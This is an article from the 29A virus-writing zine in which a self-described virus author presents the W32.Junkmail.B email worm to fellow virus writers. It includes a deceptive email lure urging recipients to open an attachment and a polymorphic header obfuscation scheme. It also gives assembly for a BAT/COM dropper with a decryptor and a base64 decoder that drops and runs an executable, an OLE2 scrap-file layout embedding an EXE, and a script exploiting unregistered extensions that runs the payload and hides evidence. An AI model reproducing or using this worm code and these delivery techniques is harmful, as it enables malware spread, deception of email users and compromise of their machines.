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More Ins and Outs of JunkMail
by roy g biv
More Ins and Outs of JunkMail roy g biv / 29A Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is swapped out). Author of world's first virus using Thread Local Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but they call it Chiton), world's first virus using Visual Basic 5/6 language extensions for replication (OU812), world's first Native executable virus (Chthon), world's first virus using process co-operation to prevent termination (Gemini, see Virus Bulletin 9/02 for a description), world's first virus using polymorphic SMTP headers (JunkMail, see Virus Bulletin 11/02 for a description), world's first viruses that can convert any data files to infectable objects (Pretext), world's first 32/64-bit parasitic EPO .NET virus (Croissant, see Virus Bulletin 11/04 for a description, but they call it Impanate), world's first virus using self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03 for a description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus Bulletin 6/04 for a description, but they call it Rugrat), world's first virus for Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel IA32 and AMD AMD64 (Shrug), world's first viruses that infect Office applications and script files using the same code (Macaroni), and world's first viruses that can infect both VBS and JScript using the same code (ACDC). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. I am awake now. ;) Do you remember W32.Junkmail? It was publised in 29A#7/Articles/29A-7.009. It brought to you some new techniques for e-mail speading. Now there is W32.Junkmail.B, which takes those techniques even further. Here is an example JunkMail e-mail before obfuscation: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=WNOQFOMM --WNOQFOMM I received this file from you yesterday evening. I think it was sent without you knowing by the Aliz virus. The filename was changed but it looked like an important video inside. You should look at this file to see what it is. The attachment might open automatically. This is normal behaviour. If you see a prompt to Open or Save the email then choose Open. If the attachment is blocked by Outlook 2002 then see http://support.microsoft.com/support/kb/articles/q290/4/97.asp --WNOQFOMM Content-Type: text/html Content-Transfer-Encoding: quoted-printable <IFRAME SRC=3DCID:EMAIL WIDTH=3D0> --WNOQFOMM Content-Type: application/x-mplayer; name=email.!!! Content-Transfer-Encoding: base64 Content-ID: <EMAIL> [base64 encoded file] --WNOQFOMM -- Here is an example JunkMail.B e-mail after obfuscation: mIMe-VERSion:({) 1(b) .(9) 0 CoNTent-tYPe:({) M(K)u(A67)Lt(ots)I(I)PAr(o)t(i}E) / m(q)I(t)x(d)Ed ; (J=u)bOu(Uj)n(i)dA(XT)RY (D)=(kC:) WNOQFOMM WKTHHMEFXDHCQQDJXPKENXBMNJKTROIRHAWBXCXUPLYWNYELAEKDPNNKIYBQRDS MSLBYERZ WNOQFOMM-- --WNOQFOMM I received this file from you yesterday evening. I think it was sent without you knowing by the Badtrans virus. The filename was altered but it looked like an important database inside. You should look at this file to see what it is. The attachment might open automatically. This is normal behaviour. If you see a prompt to Open or Save the email then choose Open. If the attachment is blocked by Outlook 2002 then see http://support.microsoft.com/support/kb/articles/q290/4/97.asp --WNOQFOMM coNTENt-TYPe: (Ve)t(%)ex(-s1)T(4) / (T)H(66r)TMl cONTEnT-TrAnsfeR-enCODIng:Q(%)UO(vV)t(_i)e(1)d(ng,)-(o)p(YMt)RIN(l)tABle =3C=49=46=52=41=4D=45 =53R=43=3D=43=49D=3AE=4D=41I=4C=20=57IDT=48=3D=30> --WNOQFOMM ConTENT-Type: A(4)PPl(w)I(H)C(N)Ati({)On (d)/(4};) x-(1)M(YI)PLA(I)Yer; (]$)na(!r)m(6t{)e =(N`) e(J-)m(;n>)aI($0)l(hWq).(X1)!(6<)!! cOnTenT-TRAnSFer-eNcOdiNG:(m) b({H)A(N)S(#)e64 coNTenT-id: ({)< E(a'B)M(X)AIL(?) > [base64 encoded file] --WNOQFOMM ZXFLNEJXAARBKTNYLFFHRGANZVPMVLYDTRKXYENBMIJJTCKLOBCWKBSGJG CGYUXHPAUZWFFIPIHQTNSAZDWSAYYUMYQFOJYUTPACLEWMRZMWUPEHX KHDZDFVSSTSSKSRKOAUWQUFPREJC ONIPXHYHPQKMBJIIAKSHNFVZJUCFYMQIZKV FGBFLHDCJQHTCIQMMSXAKARDSIUVWMUELAG KGGSCOAXWICNEKKCRXONRMAPEKMJOXCTQRP CXRMQZFD -- Yes, the engine has been improved to include spaces, and comments after ':'. There is also a new exploit that is related to OLE2-format files which have an unregistered extension. Using the right CLSID, it is possible to run scripts (and probably other things, too). The well-known CLSID is for MSHTA.EXE, to run HTA files. It is: {3050f4d8-98b5-11cf-bb82-00aa00bdce0b} However, there is another CLSID that can also be used. It is for MSHTML.DLL, to display HTML pages. It is: {25336920-03f9-11cf-8fd0-00aa00686f13} That one is used by Internet Explorer, but a bug means that IE will run the page continuously until the page is closed. To avoid this bug, you should close the page yourself. We still use random choice of file content (not only the extension). We can choose between a .BAT file, a Windows executable file, and a OLE2 scrap file. The .BAT file is updated to also be a .COM file, and the OLE2 scrap file is updated to carry a script, if the unregistered extension method is used. The .BAT file code was completely rewritten. It was made smaller, and no longer needs to drop a .COM file, since it is both formats already. It just renames itself to .COM and runs itself again. Now it looks like this: s branch instruction for COM mode goto r:gb! skip long line that follows in BAT mode This decryptor came from my shellcode research using the imul instruction to decode bytes using ASCII-encoded nybbles. Since I was not restricted to an alphanumeric set, it was very easy. This code decodes our base64 decoder. push 38h pop cx initialise key to decode imul sub al, 21h an arbitrary value to give ASCII relative offsets push ax pop si push ax pop di sub [si + 3f], cl decode imul (48h -> 10h) imul ax, [si + 51], 48h get top nybble xor al, [si + 50] combine with bottom nybble xor al, 40 decode byte and [di + 50], ch zero destination xor [di + 50], al store byte inc si inc si inc di dec cx jne 017b replaced by 011b The base64 decoder and the file follow immediately. Since they are both base64-encoded now, the decoder can be partially encoded itself, and decode itself and the file at the same time. Since the CRLF are no longer emitted, so the code size is reduced. The block is delimited by a space, so the filename restriction is also removed. add si, 50h point to base64 block add di, 50h point to decode destination b64decode proc near lods dword ptr [esi] push 4 pop cx b64_inner label near rol eax, 8 cmp al, '0' jnb b64_testchar add al, (('/' shl 2) + 1) and 0ffh shr al, 2 '+' and '/' differ by only 1 bit b64_testchar label near add al, 4 cmp al, 3fh jbe b64_store sub al, 45h cmp al, 19h jbe b64_store sub al, 6 b64_store label near shrd ebx, eax, 6 loop b64_inner xchg ebx, eax bswap eax stos dword ptr [di] dec di cmp byte ptr [si], 4fh replaced during decode by ' ' [jne b64decode branch instruction is decoded] b64decode endp now to drop and run decoded .EXE file mov ah, 3ch mov dx, 188h using MZ header as filename int 21h xchg bx, ax mov ah, 40h dec cx int 21h mov ah, 3eh int 21h mov ah, 4Ah mov bl, 42h must point to block of zeroes int 21h mov ax, 4b00h int 21h ret [file base64 data here] -- The scrap file is the same 512 bytes-per-page OLE2 file with embedded .EXE. New is the presence of the CLSID, if the unregistered extension exploit is used. Here is the file: db 0d0h, 0cfh, 11h, 0e0h, 0a1h, 0b1h, 1ah, 0e1h 000 signature db 10h dup (0) 008 unused dw 0, 0 018 DLL version dw 0 01c byte order (for Unicode) dw 9 01e shift count for main FAT dw 0 020 shift count for mini FAT dw 0 022 reserved dd 0, 0 024 reserved dd 1 02c pages in main FAT dd 1 030 page of root storage dd 0 034 unused dd 0 038 size of main pages dd 0 03c page of mini FAT dd 0 040 pages in mini FAT dd 0 044 next page in main FAT (end of chain) dd 0 048 unused dd 6dh dup (0) 04c filler dd 0 200 main FAT page dd 0fffffffeh 204 root storage chain dd ? dup (?) 208 embedded object stream chain (variable size) dw 1, "Ole10Native", 14h dup (0) 400 stream name dw 1ah 440 name length db 2 442 attribute (2=stream, unchecked for Root Storage) db 0 443 unused dd 0ffffffffh, 0ffffffffh 444 left and right node indexes dd 1 44c storage index (overload as Root Storage) db 10h dup (0) 450 CLSID or CLSID 25336920-03f9-11cf-8fd0-00aa00686f13 (HTML Document) or CLSID 3050f4d8-98b5-11cf-bb82-00aa00bdce0b (HTML Application) dd 0 460 flags dq 0, 0 464 create and modify times dd 2 474 data page dd ? 478 stream size dd 0 47c unused dw 3, "ITEM000", 18h dup (0) 480 scrap storage name dw 12h 4c0 name length db 1 4c2 attribute (1=storage) db 0 4c3 unused dd 0ffffffffh, 0ffffffffh 4c4 left and right node indexes dd 0 4cc storage index CLSID 0003000c-0000-0000-c000-000000000046 4d0 scrap CLSID dd 0 4e0 flags dq 0, 0 4e4 create and modify times dd 0 4f4 data page (unused by storages) dd 0 4f8 stream size dd 0 4fc unused dd 40h dup (0) 500 unused directory entries dd ? 600 scrap size dw 0 604 number of strings following dw 3 606 type (3=static) dd 6 608 filename length db "\.exe", 0 60c filename (only directory and suffix required) dd ? 612 embedded object size 616 Embedded .EXE file follows immediately. If the unregistered extension exploit is used, then this script is appended: new ActiveXObject('WScript.shell').exec('rundll32 shscrap,OpenScrap_RunDLL '+document.URL.substr(7));window.close() It opens the file as a scrap file, after skipping the "file://" protocol, then closes the window, in order to hide the evidence, and avoid the IE bug. The .SHS file is also special. I call it a self-destructing file, because after it runs, Windows will notice that it is malformed and try to fix it, but the resulting file is destroyed, and cannot be run again. It is another way to hide the evidence. :) Greets to friendly people (A-Z): Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - The Gingerbread Man - Ultras - uNdErX - Vecna - VirusBuster - Whitehead rgb/29A jun 2005 iam_rgb@hotmail.com |